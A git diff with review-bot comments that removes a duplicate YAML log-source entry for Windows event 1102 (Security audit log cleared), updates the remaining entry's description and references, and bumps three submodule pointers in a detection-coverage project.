--- a/data_needed/DN_0025_1102_the_audit_log_was_cleared.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-title: DN_0038_1102_the_audit_log_was_cleared
-description: >
- Event 1102 is logged whenever the Security log is cleared,
- REGARDLESS of the status of the Audit System Events audit policy
-loggingpolicy:
- - none
-references:
- - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1102#security-monitoring-recommendations
- - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102
-category: OS Logs
-platform: Windows
-type: Windows Log
-channel: Security
-provider: Microsoft-Windows-Eventlog
-fields:
- - EventID
- - Hostname # redundant
- - Computer
- - SubjectUserSid
- - SubjectUserName
- - SubjectDomainName
- - SubjectLogonId
-sample: |
- -
- -
-
- 1102
- 0
- 4
- 104
- 0
- 0x4020000000000000
-
- 1087729
-
-
- Security
- DC01.contoso.local
-
-
- -
- -
- S-1-5-21-3457937927-2839227994-823803824-1104
- dadmin
- CONTOSO
- 0x55cd1d
-
-
-
-
\ No newline at end of file
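Review bot: deleting this duplicate of the 1102 data-needed entry is the right call (its `title` even reads `DN_0038_...` while the file is `DN_0025_...`, so it was never consistent), but two things should travel with the deletion. First, grep the detection rules and any customer or analytics files for `DN_0025` or `DN_0038_1102_the_audit_log_was_cleared` in their `data_needed:` lists, since a dangling reference will break the analytics generation silently. Second, this file carried content the surviving `DN_0050` entry should not lose if it does not already have it: the `provider: Microsoft-Windows-Eventlog` line, the `fields` list (`SubjectUserSid`, `SubjectUserName`, `SubjectDomainName`, `SubjectLogonId` are what a 1102 detection actually keys on for attribution) and the `docs.microsoft.com` reference with the `#security-monitoring-recommendations` anchor. The `sample` block as extracted here is just bare values with the XML tags stripped, so it is not worth preserving as-is.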
diff --git a/data_needed/DN_0050_1102_audit_log_was_cleared.yml b/data_needed/DN_0050_1102_audit_log_was_cleared.yml
index 10674c4..5a6f071 100644
--- a/data_needed/DN_0050_1102_audit_log_was_cleared.yml
+++ b/data_needed/DN_0050_1102_audit_log_was_cleared.yml
@@ -1,10 +1,12 @@
title: DN_0050_1102_audit_log_was_cleared
description: >
- This event generates every time Windows Security audit log was cleared
+ Event 1102 is created whenever the Security log is cleared,
+ REGARDLESS of the status of the Audit System Events audit policy
loggingpolicy:
- None
references:
- https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md
+ - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102
category: OS Logs
platform: Windows
type: Windows Log
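Review bot: the new description wording is the same as the one in the file being deleted, including the all-caps `REGARDLESS`; this is fine for emphasis but consider lower case so it matches the register of the other `data_needed` descriptions. The reference added on the `+` line is good; consider also adding the `docs.microsoft.com` URL (the published page, with the `#security-monitoring-recommendations` anchor) alongside the `github.com/MicrosoftDocs` source link, since the GitHub `master` path is the documentation source tree and can be moved or renamed without notice. Unrelated to this change but visible in the context: `loggingpolicy` is `None` here while the deleted entry used `none`; whichever casing the schema expects should be applied consistently, because anything that filters on the literal value will treat them as different.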
diff --git a/detection_rules/sigma b/detection_rules/sigma
index 5ea6235..693830f 160000
--- a/detection_rules/sigma
+++ b/detection_rules/sigma
@@ -1 +1 @@
-Subproject commit 5ea623506f95832177c245c8c072d1c71d06c192
+Subproject commit 693830fa838da070e125342bf108efc8cf8f9d42
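Review bot: this submodule pointer bump (and the `atc-response` and `atomic-red-team` bumps that follow) lands in the same commit as the data-needed cleanup with no mention in the diff of what upstream changes are being pulled in. Moving `detection_rules/sigma` to a new commit changes which Sigma rules and which rule metadata the generated `Atomic_Threat_Coverage` markdown and Navigator profiles are built from, so the regenerated files in this patch are a mix of the local edits and whatever changed upstream. Suggest either splitting the submodule updates into their own commit or stating the upstream commit range and the reason for the update in the commit message, so a reviewer can tell which generated changes are expected.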
diff --git a/response/atc-response b/response/atc-response
index f54b8ec..155fbfa 160000
--- a/response/atc-response
+++ b/response/atc-response
@@ -1 +1 @@
-Subproject commit f54b8ec6cb83b7214b9560115df004c404ccbc6c
+Subproject commit 155fbfa6df7b8b10b92f22a2fec083e4db373402
diff --git a/triggers/atomic-red-team b/triggers/atomic-red-team
index 9476a63..d58d614 160000
--- a/triggers/atomic-red-team
+++ b/triggers/atomic-red-team
@@ -1 +1 @@
-Subproject commit 9476a6348d4ce62931993af6b953688666ca2453
+Subproject commit d58d614940e9ac224677c6d49625e5274c0047be